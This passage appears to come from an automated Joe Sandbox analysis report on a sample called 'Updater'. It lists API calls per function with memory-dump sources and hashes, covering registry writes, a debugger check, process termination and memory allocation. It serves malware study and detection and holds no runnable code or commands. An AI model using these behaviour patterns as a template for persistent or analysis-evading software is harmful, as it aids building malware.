                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                  • String ID:
                                                                                                  • API String ID: 2336955059-0
                                                                                                  • Opcode ID: 9c14f165b1fec29e51933f5bb6c703b11eab564a09223632054e65ff8156d727
                                                                                                  • Instruction ID: 2ff04a6a1dcd1e4ed007daa940192738c83e0fc3f36e7d40ebadc89dfe6b4198
                                                                                                  • Opcode Fuzzy Hash: 9c14f165b1fec29e51933f5bb6c703b11eab564a09223632054e65ff8156d727
                                                                                                  • Instruction Fuzzy Hash: DF012833B10219EBCB159F99DC0986E3BA9EB85320B240349F911972D1EAB99D01C790
                                                                                                  APIs
                                                                                                  • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,?,?,00000000,014B84C2), ref: 014B8437
                                                                                                  • RegCreateKeyExA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,014B84C2), ref: 014B846B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateOpen
                                                                                                  • String ID:
                                                                                                  • API String ID: 436179556-0
                                                                                                  • Opcode ID: 08629a5642657d2d058cc2dec7dea50e967ba9f756feb8055d9d53de856c47db
                                                                                                  • Instruction ID: ebb18254801c7a474c0db0ee399399c4e1005333b4c6e80fd756a866c95a71bc
                                                                                                  • Opcode Fuzzy Hash: 08629a5642657d2d058cc2dec7dea50e967ba9f756feb8055d9d53de856c47db
                                                                                                  • Instruction Fuzzy Hash: 8B316635A0020A7FEB11DBA5CC80BDFB7BCAF28300F54847EA514E7260D7799A058760
                                                                                                  APIs
                                                                                                  • ReadFile.KERNELBASE(00000000,?,00010000,?,00000000,?,00000000,?,?,006DC03B), ref: 006E1E6E
                                                                                                  • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000001,00008000,00000000,?,00000000,?,?,006DC03B), ref: 006E1EA7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$PointerRead
                                                                                                  • String ID:
                                                                                                  • API String ID: 3154509469-0
                                                                                                  • Opcode ID: a7dc69b721628f35f9331eb87841b0d9bc575e089e6f552a41b7d884ebbc2b51
                                                                                                  • Instruction ID: 8d5db6b1987ea973a41b8df0890fe781900dc696151c2d1c4c9c93e1ba8f3fd6
                                                                                                  • Opcode Fuzzy Hash: a7dc69b721628f35f9331eb87841b0d9bc575e089e6f552a41b7d884ebbc2b51
                                                                                                  • Instruction Fuzzy Hash: 25215635200705AFD730CF16C885BA6B7FAFF09710F10882DE99A8B690C7B1B946DB60
                                                                                                  APIs
                                                                                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,006DC025,?,00008000), ref: 006E1F16
                                                                                                  • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,006DC025,?,00008000), ref: 00727483
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 823142352-0
                                                                                                  • Opcode ID: 2551c7dfc7d36d4007745adba71050b1d5389b2eb1a1ac84f596e913b13838a9
                                                                                                  • Instruction ID: e28bcc6f8454b4976c0afcbc4b7acde40697685fe1534b9ceea2614f21a1bc70
                                                                                                  • Opcode Fuzzy Hash: 2551c7dfc7d36d4007745adba71050b1d5389b2eb1a1ac84f596e913b13838a9
                                                                                                  • Instruction Fuzzy Hash: C7018030245365B6E3351A2ACD0EF977F99EF06B70F108200FAA95E1E1C7B45855DB94
                                                                                                  APIs
                                                                                                  • IsThemeActive.UXTHEME ref: 006EFC4A
                                                                                                    • Part of subcall function 006EFC98: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 006EFCAD
                                                                                                    • Part of subcall function 006EFC98: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 006EFCC4
                                                                                                    • Part of subcall function 006E2D33: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 006E2D63
                                                                                                    • Part of subcall function 006E2D33: IsDebuggerPresent.KERNEL32 ref: 006E2D76
                                                                                                    • Part of subcall function 006E2D33: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 006E2DE2
                                                                                                    • Part of subcall function 006E2D33: SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 006E2E63
                                                                                                  • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 006EFC84
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                                  • String ID:
                                                                                                  • API String ID: 1550534281-0
                                                                                                  • Opcode ID: 90424e73f440d847b245c804ce90505a974c0cb670b15675329cb5ad602b6b3f
                                                                                                  • Instruction ID: 1c067bce9e12b8ca20a30b2c5175f19b9369ecb708ff381e3790b0a99f2251b6
                                                                                                  • Opcode Fuzzy Hash: 90424e73f440d847b245c804ce90505a974c0cb670b15675329cb5ad602b6b3f
                                                                                                  • Instruction Fuzzy Hash: 5CF0B4316503489FEF00AB68EC0AB163BA2A747705F108815F605464E3CBFD4492CB8D
                                                                                                  APIs
                                                                                                  • ReadFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,014B66B4), ref: 014B6693
                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 014B6699
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseFileHandleRead
                                                                                                  • String ID:
                                                                                                  • API String ID: 2331702139-0
                                                                                                  • Opcode ID: f6fb5117d9105a2b2c19a13f44afa531c516638e31241b704d7cd0aabd1a6483
                                                                                                  • Instruction ID: abb4b055f2c755600770c589ca0b3dd1e25e8880178f318a8b66258eaffa8dac
                                                                                                  • Opcode Fuzzy Hash: f6fb5117d9105a2b2c19a13f44afa531c516638e31241b704d7cd0aabd1a6483
                                                                                                  • Instruction Fuzzy Hash: 11E0BF75504105BEE710EFA5DDC1EAD77FCEB7C300FA1446BF545D2160DA75AA058B20
                                                                                                  APIs
                                                                                                  • GetFileAttributesA.KERNEL32(00000000,?,?,014B8785,00000000,014B88EC,?,?,00000000,00000000), ref: 014B5FBD
                                                                                                  • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,?,?,014B8785,00000000,014B88EC,?,?,00000000,00000000), ref: 014B5FDA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AttributesFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 3188754299-0
                                                                                                  • Opcode ID: 150071e8d115d48b6e860e46511f068db359f69ce08f9d5d34f1670f96483210
                                                                                                  • Instruction ID: 6d8d7c53e5a231a9879c9a6ceaf09e6baf5c5885eaf0bc2ce43ec0ec8476afa4
                                                                                                  • Opcode Fuzzy Hash: 150071e8d115d48b6e860e46511f068db359f69ce08f9d5d34f1670f96483210
                                                                                                  • Instruction Fuzzy Hash: 10D0C7557016211FD55131BD0CC5E9B858C4F3C271FA50617F515DB2F1D6744D5211B0
                                                                                                  APIs
                                                                                                  • GetCurrentProcess.KERNEL32(00000000,014B997D,00000000,014B9998,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 014B961F
                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000,014B997D,00000000,014B9998,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 014B9625
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Process$CurrentTerminate
                                                                                                  • String ID:
                                                                                                  • API String ID: 2429186680-0
                                                                                                  • Opcode ID: b11399cddf9350ece28e91c1209740a3cf97649afd2b7b8c8d81269606c38880
                                                                                                  • Instruction ID: ab22fb1c91c30b31c97404961e6679e47734c7a4c4f6f4c5ce47938ccc1b9991
                                                                                                  • Opcode Fuzzy Hash: b11399cddf9350ece28e91c1209740a3cf97649afd2b7b8c8d81269606c38880
                                                                                                  • Instruction Fuzzy Hash: B390025854D30310DC4072B20D09F0904083B74705FC6044A5108550E05DF89501B025
                                                                                                  APIs
                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,0149DE50), ref: 0149DAEC
                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,0149DE50), ref: 0149DB13
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Virtual$AllocFree
                                                                                                  • String ID:
                                                                                                  • API String ID: 2087232378-0
                                                                                                  • Opcode ID: 98cd51d575aa20dcbb898b3ebb450b99b899cd637f74d0361bd9f4bad5e59b29
                                                                                                  • Instruction ID: 0fea438d0aecfbcac09ca2b82958f873b60898a0b8fcaf810ef4193ba1f49fcd
                                                                                                  • Opcode Fuzzy Hash: 98cd51d575aa20dcbb898b3ebb450b99b899cd637f74d0361bd9f4bad5e59b29
                                                                                                  • Instruction Fuzzy Hash: 92F08272F0462156EF21A9EA4CC4F535D949F696A0F154076FA1CEF3EED6B14C0142A1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: cb94bb72e22a057d1434bdfbbaf7108e2f2614367df46ee6ee7d06e278afce15
                                                                                                  • Instruction ID: cd25466099b363765bea7372c691eea5dfc4d8010c701a21b321b3320fc22eda
                                                                                                  • Opcode Fuzzy Hash: cb94bb72e22a057d1434bdfbbaf7108e2f2614367df46ee6ee7d06e278afce15
                                                                                                  • Instruction Fuzzy Hash: 0C421674A08351CFC764CF19C49066AB7F2BF99304F24895EE9898B390D735EE81DB86
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 70cc77e84de0c5cea011434bb30626aad89b5e06dd27061bbd7ab3816aa6ddad
                                                                                                  • Instruction ID: c00e1b32fa73883996757a081ab389f7ddf566f7312b3d724be9059afc1cf85d
                                                                                                  • Opcode Fuzzy Hash: 70cc77e84de0c5cea011434bb30626aad89b5e06dd27061bbd7ab3816aa6ddad
                                                                                                  • Instruction Fuzzy Hash: C851C771A0015CAFDB10DF68C844AB97FB7EF85364F198158E9189B7A2C772ED42CB90
                                                                                                  APIs
                                                                                                  • CharLowerBuffW.USER32(?,?), ref: 0074016F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: BuffCharLower
                                                                                                  • String ID:
                                                                                                  • API String ID: 2358735015-0
                                                                                                  • Opcode ID: a62047b5d1ca813e45c09ac32ea829f49ec2de3aff729339135127a7b9d9a599
                                                                                                  • Instruction ID: 6e22340b09f328e3b285da52eb989050fbe2b6912cdc5dd46a5612c68fc97029
                                                                                                  • Opcode Fuzzy Hash: a62047b5d1ca813e45c09ac32ea829f49ec2de3aff729339135127a7b9d9a599
                                                                                                  • Instruction Fuzzy Hash: 8F4195B6A00209EFDB11EFA4C8459AEB7F9FF44310B10852EE61697291EB74DE44CB90
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EnumWindows
                                                                                                  • String ID:
                                                                                                  • API String ID: 1129996299-0
                                                                                                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                  • Instruction ID: b32329fd5f869584e7e238476062817b4402d3707164576baea544c15be74e42
                                                                                                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                  • Instruction Fuzzy Hash: B031C372A0410ADBE718CF59C4849BDF7A6FB49344B2486A5E909CB356D731EDC1CB90
                                                                                                  APIs
                                                                                                    • Part of subcall function 006E290F: LoadLibraryA.KERNEL32(kernel32.dll,?,?,006E27DC,?,?,006E058E,?,00000001), ref: 006E291B
                                                                                                    • Part of subcall function 006E290F: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 006E292D
                                                                                                    • Part of subcall function 006E290F: FreeLibrary.KERNEL32(00000000,?,?,006E27DC,?,?,006E058E,?,00000001), ref: 006E293F
                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,006E058E,?,00000001), ref: 006E27FC
                                                                                                    • Part of subcall function 006E28D8: LoadLibraryA.KERNEL32(kernel32.dll,?,?,007277B4,?,?,006E058E,?,00000001), ref: 006E28E1
                                                                                                    • Part of subcall function 006E28D8: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 006E28F3
                                                                                                    • Part of subcall function 006E28D8: FreeLibrary.KERNEL32(00000000,?,?,007277B4,?,?,006E058E,?,00000001), ref: 006E2906
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Library$Load$AddressFreeProc
                                                                                                  • String ID:
                                                                                                  • API String ID: 2632591731-0
                                                                                                  • Opcode ID: 30a6bd9423fe49f9a11b369bf202a8a08dbd7fda8a758b7faba4b6a1f5f6b0c0
                                                                                                  • Instruction ID: e46837f234b0329a41dff92865f2bb7863641ea9a67c3a2dc8ba3f1df9afbf99
                                                                                                  • Opcode Fuzzy Hash: 30a6bd9423fe49f9a11b369bf202a8a08dbd7fda8a758b7faba4b6a1f5f6b0c0
                                                                                                  • Instruction Fuzzy Hash: CD112B3161131AAFCB24BF26CC26BAE77ABEF50710F10842EF442961C1EE755E09D754
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CountTick
                                                                                                  • String ID:
                                                                                                  • API String ID: 536389180-0
                                                                                                  • Opcode ID: e90c596dc4555caf1ed1208b22abeebb935c4f29df9349ccaf1e98bc4e938338
                                                                                                  • Instruction ID: 2a165cd4523875dc4b0ca205727f5384df00a5e4babfbc8d5fa4bea05c51d728
                                                                                                  • Opcode Fuzzy Hash: e90c596dc4555caf1ed1208b22abeebb935c4f29df9349ccaf1e98bc4e938338
                                                                                                  • Instruction Fuzzy Hash: E7110374E0420AAFDB00DF9AC8818AEBBF8FB58710B51846AFD1497310D770AE11CFA0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __wsopen_s
                                                                                                  • String ID:
                                                                                                  • API String ID: 3347428461-0
                                                                                                  • Opcode ID: d1dd38fec914ba57d6cf52783b660b3c13d119183af0a18c14b416b8440e7e35
                                                                                                  • Instruction ID: e0286fc42a3c00dc8a8cec90e5681a0e446a7237a82d0c4f6ccaeb908bf93925
                                                                                                  • Opcode Fuzzy Hash: d1dd38fec914ba57d6cf52783b660b3c13d119183af0a18c14b416b8440e7e35
                                                                                                  • Instruction Fuzzy Hash: 371188B590410AEFCB05DF58E94099A3BF4FF48300F104159F808AB341D630EA21CBA5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 67d7e353627af878a5162d5d0e6c11f5063cac9a6c49c068a19ae5eb82329a53
                                                                                                  • Instruction ID: 11622e04f5815e2ca0cb23953ab91c9beebccf82270d30c138cd5ddb048dbdda
                                                                                                  • Opcode Fuzzy Hash: 67d7e353627af878a5162d5d0e6c11f5063cac9a6c49c068a19ae5eb82329a53
                                                                                                  • Instruction Fuzzy Hash: A8F0F932501618DAD6313E69CC0DBBB37DA8F41338F140B15FB25971E2DF7AE80286A5
                                                                                                  APIs
                                                                                                  • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 014B853E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Value
                                                                                                  • String ID:
                                                                                                  • API String ID: 3702945584-0
                                                                                                  • Opcode ID: ba0b235419711254ad6799dc8a94ce1b8adafe9820c639092e7e2ba40df58196
                                                                                                  • Instruction ID: de0b947b4911091633e1a39948903e5a2625895c2371e44d41714952398b3d00
                                                                                                  • Opcode Fuzzy Hash: ba0b235419711254ad6799dc8a94ce1b8adafe9820c639092e7e2ba40df58196
                                                                                                  • Instruction Fuzzy Hash: 2DF03175A01109AFDB10DA9EDCC0AAEBBEC9B69250F044166F918D7261D6719D0187A1
                                                                                                  APIs
                                                                                                  • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 014B853E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Value
                                                                                                  • String ID:
                                                                                                  • API String ID: 3702945584-0
                                                                                                  • Opcode ID: 2bf5022169675045e15ad5be294524295543f0932f7cb92cbd81f3bd7431cce9
                                                                                                  • Instruction ID: ca42c505a805c5c372c4b20cac48af82da1ee9ad9b514841ea27aeb479f57c63
                                                                                                  • Opcode Fuzzy Hash: 2bf5022169675045e15ad5be294524295543f0932f7cb92cbd81f3bd7431cce9
                                                                                                  • Instruction Fuzzy Hash: 84F03C75A01109ABDB10EA9ADCC0A9EBBAC9B69260F044166F918DB261D67199018BA1
                                                                                                  APIs
                                                                                                  • LoadStringA.USER32(00000000,00010000,?,00001000), ref: 014A22D3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: LoadString
                                                                                                  • String ID:
                                                                                                  • API String ID: 2948472770-0
                                                                                                  • Opcode ID: 98cb9e290b6fcda0473899373f779afeb580b28c0de553bc535e0dfee71ead7e
                                                                                                  • Instruction ID: 036e633c6d937e425a3912c9f2bfb69dd646dea60054b87bff4e5b2e162bb70a
                                                                                                  • Opcode Fuzzy Hash: 98cb9e290b6fcda0473899373f779afeb580b28c0de553bc535e0dfee71ead7e
                                                                                                  • Instruction Fuzzy Hash: 16F0A0767001019FCB50EA9DCCC0F9637DC4B7C244B458066B548CB368EAB0CC4497A6
                                                                                                  APIs
                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,00000001,?,006F0445,?,?,006DFA72,00000000,?,?,?,006D1188,?), ref: 00702860
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
